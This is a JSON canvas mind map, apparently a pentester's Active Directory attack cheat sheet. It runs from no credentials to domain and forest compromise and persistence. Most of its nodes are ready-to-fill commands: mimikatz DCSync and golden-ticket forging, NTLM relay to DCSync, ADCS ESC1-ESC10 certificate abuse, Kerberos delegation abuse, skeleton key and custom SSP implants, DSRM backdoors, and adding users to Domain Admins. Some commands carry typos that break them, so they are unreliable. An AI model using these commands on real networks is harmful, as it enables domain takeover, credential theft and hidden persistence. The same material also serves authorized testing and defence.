{
"nodes":[
{"type":"group","id":"199b056b1db84f69","x":10012,"y":-7461,"width":3500,"height":6311,"color":"#484e7f","label":"Lateral move"},
{"type":"group","id":"c87e6944b87219c0","x":10036,"y":1137,"width":7315,"height":2796,"color":"#2b9c8f","label":"Kerberos Delegation Move"},
{"type":"group","id":"b6206e85d328c77d","x":6157,"y":-4774,"width":2968,"height":3228,"color":"#ff00ff","label":"Got administrator access on one machine"},
{"type":"group","id":"313b2b0bc3e14fb5","x":2003,"y":-6436,"width":3403,"height":2498,"color":"#969292","label":"Privilege escalation"},
{"type":"group","id":"2cb2c783e9a8286b","x":6609,"y":-1246,"width":2049,"height":3028,"color":"#001eff","label":"Permissions move"},
{"type":"group","id":"ac10115c0ab46bff","x":4145,"y":-1134,"width":2206,"height":2760,"color":"#37ff00","label":"Valid credentials"},
{"type":"group","id":"2eeaf30e7d43aa1e","x":-30,"y":-1972,"width":3012,"height":1472,"color":"4","label":"Classic quick compromise methods"},
{"type":"group","id":"318f3e28c4e1e98e","x":1967,"y":-3472,"width":3439,"height":1238,"color":"#7c0404","label":"Known Vulnerabilities"},
{"type":"group","id":"ac88013e301f4359","x":-1767,"y":-1029,"width":1439,"height":2462,"label":"No credentials"},
{"type":"group","id":"a648cb90f6797cf5","x":44,"y":118,"width":1792,"height":1542,"color":"#31dbdd","label":"Got username & NO password"},
{"type":"group","id":"dbaced8dfb7fd663","x":2225,"y":1234,"width":1739,"height":1289,"color":"2","label":"Cracking hash"},
{"type":"group","id":"df61625888e28d54","x":10253,"y":-695,"width":2779,"height":690,"color":"1","label":"Domain admin"},
{"type":"group","id":"d9617607e4231ae4","x":13922,"y":-562,"width":737,"height":212,"color":"#7600ad","label":"Is enterprise admin?"},
{"type":"group","id":"0e733c969c37a0dd","x":5081,"y":4430,"width":7417,"height":2506,"color":"#643900","label":"Weak ADCS Configuration"},
{"type":"group","id":"3de84bfe460894aa","x":110,"y":2737,"width":3080,"height":2391,"color":"3","label":"MITM (Listen and relay)"},
{"type":"group","id":"2bed23ec27275c48","x":14502,"y":-2749,"width":3657,"height":1743,"color":"#85afd5","label":"Trust relationship / Forest to Forest"},
{"type":"group","id":"1c4d6f661b1e09b8","x":459,"y":3244,"width":2635,"height":1526,"color":"3","label":"NTLM Relay"},
{"type":"group","id":"6c0a33a4c3980f63","x":14947,"y":-583,"width":1727,"height":1452,"color":"#305010","label":"Persistence"},
{"type":"group","id":"d00cf0b295950050","x":459,"y":2838,"width":1219,"height":333,"color":"3","label":"Listener"},
{"type":"group","id":"394eb6dedb87ac1e","x":459,"y":4870,"width":655,"height":191,"color":"3","label":"ARP Poisoning"},
{"type":"text","text":"trustlink","id":"0fc7cac354c8db5d","x":15869,"y":-1156,"width":115,"height":50},
{"type":"text","text":"MSSQL","id":"c900a2203024522d","x":16485,"y":-1206,"width":108,"height":50,"color":"#484e7f"},
{"type":"text","text":"```PowerView\nGet-DOmainForeignGroupMember -Domain <target>\n```","id":"daf0653a0f7f783c","x":15233,"y":-1671,"width":419,"height":50},
{"type":"text","text":"User on both domains","id":"8b268e45d144d2d2","x":15233,"y":-1601,"width":250,"height":60},
{"type":"text","text":"Users with foreign Domain Group Membership","id":"5c0ba8fe75642b29","x":15233,"y":-1837,"width":419,"height":50},
{"type":"text","text":"Groups with Foreign Domain Group Membership","id":"4418655d4b864df0","x":15233,"y":-1751,"width":419,"height":50},
{"type":"text","text":"Breaking forest trust (printerbug or petitpotam to force the DC of the external forest to connect to a local unconstrained delegation machine. Capture TGT, inject into memory and DCSync)","id":"61a5e0ecbe9de226","x":14892,"y":-1931,"width":725,"height":68},
{"type":"text","text":"Child Domain to Forest Compromise - extra SIDs\n","id":"f06bda543d13b44c","x":14914,"y":-2111,"width":306,"height":55},
{"type":"text","text":"ForeignGroupMember","id":"2fb2ecc2691c3b28","x":14903,"y":-1731,"width":250,"height":60},
{"type":"text","text":"Trust relationship","id":"f4a7d449136fdf6f","x":14565,"y":-1732,"width":166,"height":61,"color":"#85afd5"},
{"type":"text","text":"sp_linkedservers","id":"c2728a3f29afd86d","x":16022,"y":-1156,"width":168,"height":50},
{"type":"text","text":"use_link","id":"63a9f5f3e1462f34","x":16235,"y":-1156,"width":115,"height":50},
{"type":"text","text":"```cmd\nmimikatz lsadump::dcsync /domain:<domain> /user:<domain>\\krbtgt\n```","id":"b5b44b222f695b28","x":16371,"y":-1395,"width":588,"height":60},
{"type":"text","text":"Forest To Forest - extra SID \n(SID History / TREAT_AS_EXTERNAL)","id":"d84fedca7ebbb21e","x":14892,"y":-1397,"width":306,"height":63},
{"type":"text","text":"Password reuse","id":"2c0c952737065123","x":14892,"y":-1521,"width":250,"height":60},
{"type":"text","text":"Forest To Forest Compromise - MSSQL trusted links","id":"11713edbfc400ec8","x":14892,"y":-1204,"width":306,"height":73},
{"type":"text","text":"```PowerView\n(SID filtering, Find group with SID > 1000) Get-DomainGroupMember -Identity \"<group\"-Domain <target_domain>\n```","id":"ab10a723ac50ca60","x":15751,"y":-1409,"width":541,"height":88},
{"type":"text","text":"```PowerView\nGet-DomainSID -Domain <domain>\n```\n\n```PowerView\nGet-DomainSID -Domain <target-doman>\n```","id":"1c9acdf78c74c468","x":15275,"y":-1425,"width":416,"height":119},
{"type":"text","text":"```Powershell\nGet-SQLServerLinkCrawl -username <user> -password <pass> -Verbose -Instance <sql_instance>\n```","id":"c0b006280dbf5ff9","x":15275,"y":-1254,"width":1017,"height":50},
{"type":"text","text":"Lateral move (cred/th/..)","id":"db061ae9b2747e3c","x":15220,"y":-1516,"width":250,"height":50,"color":"#484e7f"},
{"type":"text","text":"```PowerView\nGet-DomainSID -domain <domain>\n```\n\n```PowerView\nGet-DomainSID -domain <target_domain>\n```","id":"c882b61fc8b1d367","x":15267,"y":-2150,"width":464,"height":133},
{"type":"text","text":"Unconstrained delegation","id":"be867b56016a5746","x":15691,"y":-1927,"width":250,"height":60},
{"type":"text","text":"```bloodhound\nMATCH p=(n:Group {domain:\"<domain>\"})-[:MemberOf]->(m:Group) WHERE m.domain<>n.domain AND n.name<>m.name RETURN P\n```","id":"114a49e43b8e7a7c","x":15700,"y":-1751,"width":985,"height":50},
{"type":"text","text":"\n```cmd\nmimikatz lsadump::dcsync /domain:<domain> /user:<domain>\\krbtgt\n```","id":"1e34a698a68ad250","x":15827,"y":-2041,"width":575,"height":50},
{"type":"text","text":"```cmd\nmimikatz lsadump::trust /patch\n```","id":"1d58c9c271766ccd","x":15837,"y":-2200,"width":368,"height":50},
{"type":"text","text":"ACL","id":"e36d62f76d242213","x":15559,"y":-1596,"width":186,"height":50,"color":"#001eff"},
{"type":"text","text":"```bash\nmssqlclient.py -windows-auth <domain>/<user>:<password>@$ip \n```\n\n(pr # 1397)","id":"cbe2a56446b7d8f0","x":15275,"y":-1179,"width":548,"height":96},
{"type":"text","text":"Pass the ticket","id":"b70f058406f350ff","x":17831,"y":-1390,"width":250,"height":50,"color":"#484e7f"},
{"type":"text","text":"```PowerView\nconvertfrom-sid <sid>\n```","id":"b5e902015530e9eb","x":15691,"y":-1671,"width":232,"height":50},
{"type":"text","text":"```bloodhound\nMATCH p=(n:User)-[:MemberOff]->(m:Group) WHERE n.domain=\"<domain>\" AND m.domain<> n.domain RETURN p\n```","id":"4216653e7da68863","x":15700,"y":-1837,"width":875,"height":50},
{"type":"text","text":"```bash\nldeep ldap -u <user> -p '<password>' -d <domain> -s ldap://<dc_ip> trusts\n```","id":"2c357afb33f4a64f","x":15142,"y":-2340,"width":674,"height":53},
{"type":"text","text":"```powershell\nGet-DomainTrust -Domain <domain>\n```","id":"17bc249104dd90b1","x":15142,"y":-2513,"width":473,"height":50},
{"type":"text","text":"```cmd\nmimikatz kerberos::golden /user:Administrator /domain:<domain> /sid:<domain_sid> /aes256:<trust_key_aes256> /sids:<target_domain_sid>-519 /service:krbgt /target:<target_domain> /ptt\n```","id":"33c919fc03b9bae3","x":16271,"y":-2222,"width":832,"height":94},
{"type":"text","text":"```PowerView\nGet-DomainTrustMapping\n```","id":"72a431f9153b85be","x":15142,"y":-2439,"width":250,"height":60},
{"type":"text","text":"\n```cmd\nmimikatz kerberos::golden /user:Administrator /krbtgt:<HASH_KRBTGT> /domain:<domain> /sid<user_Sid> /sids:<RootDomainSID-519> /ptt\n```","id":"6a1d01ac93409105","x":16454,"y":-2063,"width":832,"height":94},
{"type":"text","text":"```cmd\nmimikatz kerberos::golden /user:Administrator /krbtgt:<HASH_KRBTGT> /domain:<domain> /sid:<user_sid> /sids:<RootDomainSID>-<GROUP_SID_SUP_1000> /ptt\n```","id":"a54df4d799b5ff71","x":17008,"y":-1403,"width":764,"height":76},
{"type":"text","text":"Lateral move PTT","id":"c0aaa5c99344ccbd","x":17523,"y":-2128,"width":250,"height":50,"color":"#484e7f"},
{"type":"text","text":"```cmd\nnltest.exe /trusted_domains\n```","id":"1e8579243f366895","x":15142,"y":-2663,"width":337,"height":50},
{"type":"text","text":"```powershell\n([System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()).GetAllTrustRelationships()\n```\n","id":"6006925745dff1ff","x":15142,"y":-2591,"width":841,"height":60},
{"type":"text","text":"Persistence","id":"c94789c02c60c7ea","x":14989,"y":-66,"width":128,"height":50,"color":"#305010"},
{"type":"text","text":"DC shadow\n","id":"21358bb419513b13","x":15266,"y":634,"width":266,"height":50},
{"type":"text","text":"ACL manipulation","id":"0afdfcc9c3929e16","x":15266,"y":714,"width":266,"height":50},
{"type":"text","text":"Custom SSP","id":"3874a0cedc008e77","x":15266,"y":446,"width":133,"height":50},
{"type":"text","text":"Golden certificate","id":"a7b298c38145feb0","x":15266,"y":537,"width":266,"height":50},
{"type":"text","text":"Directory Service Restore Mode (DSRM)\n","id":"ae37a466db4cecc6","x":15266,"y":226,"width":266,"height":63},
{"type":"text","text":"Skeleton key","id":"07f7bd164f613352","x":15266,"y":360,"width":133,"height":50},
{"type":"text","text":"Sapphire ticket","id":"7a052540280b6cc3","x":15266,"y":148,"width":171,"height":50,"color":"#305010"},
{"type":"text","text":"Diamond ticket","id":"ad0de4c917b7c272","x":15266,"y":69,"width":171,"height":50,"color":"#305010"},
{"type":"text","text":"Enumeration","id":"71ef842aeb070a4c","x":14914,"y":-2518,"width":130,"height":60},
{"type":"text","text":"```cmd\nmimikatz \"privilege::debug\" \"misc::memssp\" \"exit\"\n```","id":"4af47f91cdfe1a15","x":15444,"y":444,"width":476,"height":55},
{"type":"text","text":"`C:\\Windows\\System32\\kiwissp.log`","id":"e06e1947f49d6cb1","x":15984,"y":447,"width":325,"height":50},
{"type":"text","text":"```bash\ncertipy forge -ca-pfx <ca_private_key> -upn <user>@<domain> -subject ÇN=<user>,CN=Users,DC=<CORP>,DC=<LOCAL>\n```","id":"dc46d10c1267592b","x":16096,"y":515,"width":426,"height":94},
{"type":"text","text":"```bash\ncertipy ca -backup -ca '<ca_name>' -username <user>@<domain> -hashes <hash>\n```","id":"5d5433335e982652","x":15592,"y":526,"width":426,"height":72},
{"type":"text","text":"```cmd\nmimikatz \"kerberos::golden /sid:<current_user_sid> /target:<target_server> /service:<target_service> /aes256:<computer_aes_key> /user:<any_user> /ptt\"\n```","id":"b8800d08d454190f","x":15521,"y":-196,"width":492,"height":110},
{"type":"text","text":"```bash\nticketer.py -nthash <machine_nt_hash> -domain-sid <domain_sid> -domain <domain> <anyuser>\n```","id":"bec6e4ddad0ac5ed","x":15522,"y":-71,"width":492,"height":110},
{"type":"text","text":"```bash\nticketer.py -aesKey <aeskey> -domain-sid <domain_sid> -domain <domain> <anyuser>\n```","id":"3409c166f6fd8a3a","x":15522,"y":-433,"width":491,"height":86},
{"type":"text","text":"```cmd\nmimikatz \"kerberos::golden /user:<admin_user>/domain:<domain> /sid:<domain-sid>/aes256:<krbtgt_aes256> /ptt\n```","id":"f5246507b43e9a7b","x":15522,"y":-322,"width":491,"height":92},
{"type":"text","text":"password is mimikatz","id":"89f4241d160243fd","x":15984,"y":360,"width":264,"height":50},
{"type":"text","text":"```powershell\nPowerShell New-ItemProperty \"HKLM:\\System\\CurrentControlSet\\Control\\Lsa\n\"-Name\"DsrmAdminLogonBehavior\" -Value 2 -PropertType DWORD\n```","id":"2647c1c3a537867c","x":15592,"y":215,"width":656,"height":85},
{"type":"text","text":"```cmd\nnet group \"domain admins\" myuser /add /domain\n```","id":"710d71c4ea9a0e28","x":15266,"y":-527,"width":480,"height":77},
{"type":"text","text":"GG Good luck for the report!","id":"15d94bfa9c9cd467","x":14320,"y":-483,"width":250,"height":60},
{"type":"text","text":"Silver ticket","id":"c5d3a06a011198ab","x":15266,"y":-136,"width":171,"height":50,"color":"#305010"},
{"type":"text","text":"Golden ticket","id":"f9dc3908afa00010","x":15266,"y":-365,"width":171,"height":50,"color":"#305010"},
{"type":"text","text":"...","id":"936c188eac094e70","x":15266,"y":786,"width":266,"height":50},
{"type":"text","text":"```cmd\nmimikatz \"privilege::debug\" \"misc::skeleton\" \"exit\"\n```","id":"f845ec3fee4c3871","x":15444,"y":360,"width":476,"height":50},
{"type":"text","text":"```cmd\nrubeus.exe hash /password:<computer_pass> /usser:<computer> /domain:<domain>\n```","id":"92426f11d07f0e11","x":11551,"y":3384,"width":711,"height":45},
{"type":"text","text":"Object: msDS-AllowedToActOnBehalfOfOtherIdentity","id":"4dd4b21098478f8f","x":11102,"y":3576,"width":314,"height":87},
{"type":"text","text":"```cmd\nrubeus.exe s4u /user:<fake_computer$> /aes256:<AES 256 HASH> /impersonateuser:administrator /msdsspn:cifs/<victim.domain.local> /altservice:krbtgt,cifs,host,http,winrm,RPCSS,wsman,ldap /domain:domain.local /ptt\n```","id":"15fa50ecaa6a6f1b","x":12316,"y":3350,"width":711,"height":113},
{"type":"text","text":"Admin","id":"fa3ee141ecec6de7","x":13121,"y":3377,"width":125,"height":60,"color":"#ff00ff"},
{"type":"text","text":"```bash\ngetST.py -self -impersonate \"administrator\" -dc-ip <ip> <domain>/<rbcd_com>$':'<rbcd_compass>'\n```","id":"613ff171aee87e05","x":13076,"y":2841,"width":535,"height":70},
{"type":"text","text":"```powershell\nInvoke-Command <target> -Scriptblock {<cmd>}\n```","id":"ea64a2c3574e1bbe","x":13430,"y":2542,"width":457,"height":45},
{"type":"text","text":"```powershell\ndir \\\\<target>\\c$\n```","id":"fb2e9934da7b4a5b","x":13389,"y":2627,"width":250,"height":60},
{"type":"text","text":"CIFS","id":"b9900a48781e9d2b","x":13246,"y":2627,"width":97,"height":60},
{"type":"text","text":"LDAP","id":"49e1bca60ff60977","x":13246,"y":2728,"width":97,"height":60},
{"type":"text","text":"```bash\nrbcd.py -delegate-from '<computer>$' -delegate-to '<target>$' -dc-ip '<dc>' -action 'write' <domain>/<user>:<password>\n```","id":"2a570eea990f7435","x":11551,"y":3585,"width":657,"height":70},
{"type":"text","text":"```bash\ngetST.py -spn host/<dc_fqdn> '<domain>/<computer_account>:<computer_pass>' -impersonate Administrator --dc-ip <dc_ip>\n```","id":"691352e17b9120bf","x":12315,"y":3585,"width":657,"height":70},
{"type":"text","text":"Kerberos TGT","id":"d0d2b00cf57e8b05","x":14005,"y":2517,"width":142,"height":50,"color":"#484e7f"},
{"type":"text","text":"```bash\ngetST.py -spn <constrained_spn>/<target> -hashes '<hash>' '<domain>/<constrained>$' -impersonate Administrator --dc-ip <dc_ip> -additional-ticket <previous_ticket>\n```","id":"7a57f2226d4b2f30","x":14283,"y":2815,"width":504,"height":122},
{"type":"text","text":"```bash\ngetST.py -spn host/<constrained> -hashes '<hash>' '<domain>/<computer_account>'-impersonate Administrator --dc-ip <dc_ip> -additional-ticket <previous_ticket>\n```","id":"c019c4f1400b83d3","x":13706,"y":2828,"width":504,"height":96},
{"type":"text","text":"Kerberos TGT","id":"1641ae8f6456ccf5","x":13121,"y":3595,"width":142,"height":50,"color":"#484e7f"},
{"type":"text","text":"Without protocol transition (kerberos only) \nObject: msDS-AllowedToDelegateTo \nUAC: TRUSTED_FOR_DELEGATION","id":"641cf140dc557743","x":11151,"y":2945,"width":400,"height":104},
{"type":"text","text":"```bash\naddcomputer.py -computer-name '<rbcd_com>$' -computer-pass '<rbcd_compass>' -dc-ip <dc> '<domain>/<user>:<password>'\n```","id":"8595c43671279983","x":11847,"y":2846,"width":535,"height":60},
{"type":"text","text":"RBCD","id":"20645e50be712f32","x":11650,"y":2847,"width":150,"height":60},
{"type":"text","text":"self RBCD","id":"3838a5d430a8aee7","x":11650,"y":3049,"width":150,"height":60,"color":"3"},
{"type":"text","text":"```powershell\nEnter-Pssesion -computername <target>\n```","id":"3c0516048059017b","x":13430,"y":2473,"width":457,"height":45},
{"type":"text","text":"Kerberos TGS","id":"7cbc9342b753b463","x":14894,"y":2851,"width":142,"height":50,"color":"#484e7f"},
{"type":"text","text":"```powershell\npsexec \\\\\\<target> <cmd>\n```","id":"9b7be95564f9a315","x":13430,"y":2372,"width":327,"height":45},
{"type":"text","text":"HOST","id":"f6deb9eca9af1c7c","x":13246,"y":2364,"width":97,"height":60},
{"type":"text","text":"Resource-Based Constrained Delegation (RBCD)","id":"0870711bee1b0662","x":10786,"y":3589,"width":250,"height":60},
{"type":"text","text":"Add computer account","id":"4b231dd4e2c79485","x":11551,"y":3760,"width":250,"height":50},
{"type":"text","text":"Altservice","id":"5f1a746b4edb8248","x":13009,"y":2525,"width":133,"height":60},
{"type":"text","text":"HTTP","id":"4523b8e0114bd1ce","x":13246,"y":2495,"width":97,"height":60},
{"type":"text","text":"```bash\naddcomputer.py -computer-name '<computer_name>' -computer-pass '<ComputerPassword>' -dc-host <dc> -domain-netbios <domain_netbios> '<domain>/<user>:<password>'\n```","id":"fed9fd3af05fbe01","x":11907,"y":3737,"width":657,"height":96},
{"type":"text","text":"Constrained delegation","id":"94f151252d4bb5b8","x":10756,"y":2439,"width":250,"height":60},
{"type":"text","text":"Kerberos Delegation","id":"ce3ed2e87fabc3bf","x":10251,"y":2581,"width":250,"height":60,"color":"#2b9c8f"},
{"type":"text","text":"Zero-logon (safe method) (CVE-2020-1472)","id":"03aa7577dd561f14","x":1040,"y":4612,"width":227,"height":60,"color":"#7c0404"},
{"type":"text","text":"SMB => Netlogon","id":"fa7f3612e8b6bb2c","x":826,"y":4612,"width":167,"height":60,"color":"3"},
{"type":"text","text":"wsus relay","id":"8d43cc23f6800e6a","x":505,"y":4936,"width":164,"height":60,"color":"3"},
{"type":"text","text":"```bash\npywsus.py\n```","id":"6208b8ec8cb8bd51","x":755,"y":4936,"width":250,"height":60},
{"type":"text","text":"=> MSSQL","id":"9fe7e01576c3d5ee","x":826,"y":4443,"width":167,"height":60,"color":"3"},
{"type":"text","text":"relay to mssql","id":"0b23fa8aeba89359","x":1073,"y":4443,"width":143,"height":60},
{"type":"text","text":"http ADCS web","id":"3217f41e9d6f81ac","x":1097,"y":4191,"width":149,"height":60},
{"type":"text","text":"```bash\nntlmrelayx.py -t dcsync://<dc_02_ip> -smb2support -auth-smb <user>:<password>\n```","id":"5d67046ebea70b82","x":1730,"y":4612,"width":681,"height":60},
{"type":"text","text":"coercion comes from dc01, relay to dc02","id":"735abd0451488837","x":1326,"y":4612,"width":324,"height":60},
{"type":"text","text":"```bash\nntlmrelayx.py -t mssql://$ip -smb2support -socks\n```","id":"42fcff6fab986d94","x":1294,"y":4448,"width":505,"height":50},
{"type":"text","text":"Lateral move (SOCKS)","id":"b2e9ac9bc43f04f0","x":1879,"y":4443,"width":250,"height":60,"color":"#7da2de"},
{"type":"text","text":"DcSync","id":"b19d3f086e8b4ed5","x":2495,"y":4612,"width":250,"height":60,"color":"#8199cf"},
{"type":"text","text":"ESC8","id":"ae69d038036b0721","x":1290,"y":4191,"width":93,"height":60,"color":"#fa05cd"},
{"type":"text","text":"```bash\nsccm ntlm relay attack\n```","id":"a2031b9cc395301b","x":1091,"y":4293,"width":250,"height":60},
{"type":"text","text":"```bash\nnmap -Pn -sS -T4 --open --script smb-security-mode -p 445 <ADDRESS/MASK>\n```","id":"0ab015e539552be3","x":1589,"y":3692,"width":627,"height":61},
{"type":"text","text":"SMB unsigned","id":"80f37d4b7beb09a4","x":1018,"y":3850,"width":162,"height":60},
{"type":"text","text":"HTTP(S) => LDAP","id":"cc9bb624ffbc28b2","x":810,"y":3594,"width":167,"height":60,"color":"3"},
{"type":"text","text":"=> SMB","id":"f3d1352fd1d2d5ef","x":810,"y":3850,"width":167,"height":60,"color":"3"},
{"type":"text","text":"=> HTTP","id":"5e069d4bce2e67f5","x":826,"y":4233,"width":167,"height":60,"color":"3"},
{"type":"text","text":"NetNTLMv2","id":"53c99bd32de19222","x":1046,"y":3489,"width":136,"height":60},
{"type":"text","text":"SMB => LDAP(S)","id":"415c928a4fd4c032","x":809,"y":3436,"width":167,"height":60,"color":"3"},
{"type":"text","text":"User","id":"cc68e92cbeea355c","x":2015,"y":3972,"width":98,"height":55,"color":"5"},
{"type":"text","text":"relay to LDAP","id":"200b2ea34dedb4c0","x":1561,"y":3489,"width":141,"height":60},
{"type":"text","text":"remove mic (CVE-2019-1040)","id":"dd919045083d667c","x":1246,"y":3489,"width":250,"height":60,"color":"#7c0404"},
{"type":"text","text":"```bash\nresponder -i eth0\n```","id":"4206fa0a2cbba7e0","x":768,"y":2864,"width":250,"height":60},
{"type":"text","text":"Listen","id":"243546a3742534e4","x":505,"y":2965,"width":164,"height":60,"color":"3"},
{"type":"text","text":"(MITM)\nListen and Relay","id":"4a5c61595a84f24b","x":189,"y":3976,"width":164,"height":60,"color":"3"},
{"type":"text","text":"NTLM relay","id":"6e94e4f90fb271b7","x":505,"y":3709,"width":164,"height":60,"color":"3"},
{"type":"text","text":"```bash\ncertipy req -u <user>@<domain> -p <password> -target <ca_server> -template <'vulnerable template name'> -ca <ca_name> -upn <target_user>@<domain>\n```","id":"bda9a87543481b48","x":7367,"y":4786,"width":1212,"height":69},
{"type":"text","text":"Get templates information","id":"845bff1b81010be0","x":5489,"y":4940,"width":250,"height":60},
{"type":"text","text":"```bash\ncertipy relay -ca <ca_ip> -template DomainController\n```","id":"ec5473aacfece323","x":6024,"y":4685,"width":939,"height":60},
{"type":"text","text":"```cmd\ncertutil -v deTemplate\n```","id":"0f2b297e67e928ee","x":5832,"y":4855,"width":357,"height":60},
{"type":"text","text":"```cmd\ncertify.exe find [/vulnerable]\n```","id":"16c6d749cda99b66","x":5828,"y":4939,"width":361,"height":60},
{"type":"text","text":"Misconfigured Certificate Templates","id":"26c066d4285c92c7","x":6389,"y":4940,"width":319,"height":60},
{"type":"text","text":"ESC2","id":"b3796d45f829be1f","x":6799,"y":4940,"width":106,"height":60,"color":"#ffdd00"},
{"type":"text","text":"```bash\ngettgtpkinit.py -pfx-base64 $(cat cert.b64) <domain>/<dc_name>$ <ccache_file>\n```","id":"1c0868bac742aa59","x":7073,"y":4584,"width":751,"height":60},
{"type":"text","text":"```cmd\nRubeus.exe asktgt /user:<user> /certificate:<base64-certificate> /ptt\n```","id":"2f8fff95a73d437c","x":7073,"y":4494,"width":751,"height":60},
{"type":"text","text":"```bash\ncertipy auth -pfx <certificate> -dc-ip <dc_ip>\n```","id":"abc152b6d50aaa7e","x":7073,"y":4685,"width":751,"height":60},
{"type":"text","text":"Pass the ticket","id":"a133f3265cdd8c64","x":7954,"y":4639,"width":183,"height":60,"color":"#484e7f"},
{"type":"text","text":"DcSync","id":"6f790ee8c7e6003d","x":8191,"y":4639,"width":133,"height":60,"color":"#8199cf"},
{"type":"text","text":"Domain Admin","id":"9f7523567c384ad0","x":8398,"y":4639,"width":250,"height":60,"color":"1"},
{"type":"text","text":"ESC1 (Request a certificate from a vulnerable template)","id":"eb7c5437281c06e5","x":6799,"y":4855,"width":454,"height":60,"color":"#ffdd00"},
{"type":"text","text":"ESC3 (Use an enrollment agent to request a certificate)","id":"ec59616e05a9eb24","x":6799,"y":5028,"width":454,"height":60,"color":"#ffdd00"},
{"type":"text","text":"ESC9","id":"67abcce79376ea7c","x":8344,"y":6374,"width":178,"height":60,"color":"#ffdd00"},
{"type":"text","text":"ESC10 (Case1)","id":"f35137628a9a31c6","x":8344,"y":6495,"width":178,"height":60,"color":"#ffdd00"},
{"type":"text","text":"```cmd\ncertify.exe request request /ca:<server>\\<ca-name> /template:<template> /onbehalfof:<domain>\\<user> /enrollcert:<path.pfx> [/enrollcertpw:<cert-password>]\n```","id":"ec95567a9d40e7c7","x":8512,"y":4973,"width":1522,"height":60},
{"type":"text","text":"ESC1 on vulnerable template","id":"1f9362199d48f905","x":8252,"y":5279,"width":298,"height":60,"color":"4"},
{"type":"text","text":"Restore template","id":"caa231e604de4ac2","x":8615,"y":5279,"width":175,"height":60},
{"type":"text","text":"```bash\ncertipy req -username <user>@<domain> -password <password> -ca <ca_name> -template '<vulnerable template name>' -upn '<target_user>'\n```","id":"8ea2e6f00f9d9fa0","x":8291,"y":5575,"width":1160,"height":45},
{"type":"text","text":"error, but save private key","id":"7acb811072440807","x":9498,"y":5567,"width":250,"height":60},
{"type":"text","text":"```bash\ncertipy template -u <user>@<domain> -p '<password>' -template <vuln_template> -configuration <template>.json\n```","id":"3ae1e2529e78887b","x":8860,"y":5279,"width":1030,"height":60},
{"type":"text","text":"```bash\ncertipy req -username <accountB>@<domain> -hashes <hashB> -ca <ca_name> -template <vulnerable template>\n```","id":"c067a4e13cdd1cfc","x":8578,"y":6374,"width":1124,"height":60},
{"type":"text","text":"```bash\ncertipy req -username <accountB>@<domain> -hashes <hashB> -ca <ca_name> -template <any template with client auth>\n```","id":"7f710eaabde8010d","x":8578,"y":6494,"width":1124,"height":60},
{"type":"text","text":"Reset accountB UPN","id":"8a609c1e19688e91","x":9840,"y":6435,"width":250,"height":60},
{"type":"text","text":"```bash\ncertipy account update -username <accountA>@<domain> -password <passA> -user <accountB> -upn <accountB>@<domain>\n```","id":"f69b05a6442c18db","x":10174,"y":6437,"width":1015,"height":57},
{"type":"text","text":"```bash\ncertipy req -u <user>@<domain> -p <password> -target <ca_server> -template '<vulnerable template name>' -ca <ca_name> -pn-behalf-of '<domain>\\<user>' -pfx <pfc_file>\n```","id":"591d4db1c96b189d","x":8512,"y":5058,"width":1522,"height":60},
{"type":"text","text":"Issue request","id":"f5c8da4ed138dce9","x":9805,"y":5567,"width":142,"height":60},
{"type":"text","text":"[Kerberos Mapping] ESC9/ESC10 (Case2)","id":"785770222507a4f5","x":11290,"y":6495,"width":348,"height":60},
{"type":"text","text":"[Kerberos Mapping] ESC9/ESC10 (Case1)","id":"397002da0b4015d7","x":11290,"y":6375,"width":348,"height":60},
{"type":"text","text":"Pass the certificate","id":"90c1f9a89ef5df48","x":11728,"y":6434,"width":183,"height":60,"color":"#484e7f"},
{"type":"text","text":"```cmd\ncertify.exe request /ca:<erver>\\<ca-name> /template:\"<vulnerable template name>\" [/altname:\"Admin\"]\n```","id":"ecc8363a5d25f6a4","x":7367,"y":4885,"width":1212,"height":69},
{"type":"text","text":"Pass the certificate","id":"bb9efb366d69f052","x":8701,"y":4855,"width":183,"height":60,"color":"#484e7f"},
{"type":"text","text":"```cmd\ncertify.exe request /ca:<server>\\<ca-name> /template:\"<vulnerable template name>\"\n```","id":"9c672d0158f7dbe4","x":7354,"y":4973,"width":1044,"height":60},
{"type":"text","text":"```bash\ncertipy req -u <user>@<domain> -p <password> -target <ca_server> -template '<vulnerable template name>' -ca <ca_name>\n```","id":"b951bf4ff29377a0","x":7354,"y":5058,"width":1044,"height":60},
{"type":"text","text":"Pass the certificate","id":"be00602286141a73","x":10202,"y":5003,"width":183,"height":60,"color":"#484e7f"},
{"type":"text","text":"Pass the certificate","id":"9fcc7a3894ef3e03","x":11728,"y":5567,"width":183,"height":60,"color":"#484e7f"},
{"type":"text","text":"```bash\ncertipy req -u <user>@<domain> -p '<password>' -ca <ca_name> -retrieve <request_id>\n```","id":"a1ed1406f13bc6fb","x":10894,"y":5567,"width":744,"height":60},
{"type":"text","text":"```bash\ncertipy ca -u <user>@<domain> -p '<password>' -ca <ca_name> -issue-request <request_id> \n```","id":"7ab260a32e20f511","x":10053,"y":5567,"width":744,"height":60},
{"type":"text","text":"ESC9/ESC10 (Case1)","id":"1ffe2d732172aab2","x":6994,"y":6435,"width":178,"height":60,"color":"#ffdd00"},
{"type":"text","text":"ESC10 (Case 2)","id":"b89b5aa13f11ddb0","x":6994,"y":6759,"width":178,"height":60,"color":"#ffdd00"},
{"type":"text","text":"```bash\ncertipy account update -username <accountA>@<domain> -password <passA> -user <accountB> -upn Administrator\n```","id":"860112e5110e5cef","x":7231,"y":6434,"width":974,"height":60},
{"type":"text","text":"```bash\ncertipy account update -username <accountA>@<domain> -password <passA> -user <accountB> -upn '<dc_name$>@<domain>'\n```","id":"90b914ad585e3e3f","x":7231,"y":6759,"width":974,"height":60},
{"type":"text","text":"ESC1 ","id":"68bebda4c336b307","x":8103,"y":6021,"width":102,"height":60,"color":"4"},
{"type":"text","text":"Manage certificate","id":"dc92572d4e39c8e7","x":7003,"y":5565,"width":250,"height":60},
{"type":"text","text":"```bash\ncertipy ca -ca <ca_name> -enable-template '<ecs1_vuln_template>' -username <user>@<domain> -password <password>\n```","id":"b62dc14a9a918614","x":7308,"y":5575,"width":940,"height":45},
{"type":"text","text":"ESC4","id":"fc07177e74655d50","x":6799,"y":5279,"width":106,"height":60,"color":"#ffdd00"},
{"type":"text","text":"```bash\ncertipy shadow auto -username <accountA>@<domain> -p <passA> -account <accountB>\n```","id":"4856715923ecfc4d","x":6121,"y":6600,"width":784,"height":60},
{"type":"text","text":"Vulnerable PKI Object access control","id":"849e4315f3bbfc3a","x":6145,"y":6240,"width":356,"height":60},
{"type":"text","text":"ESC5","id":"a319627459591596","x":6568,"y":6240,"width":106,"height":60,"color":"#ffdd00"},
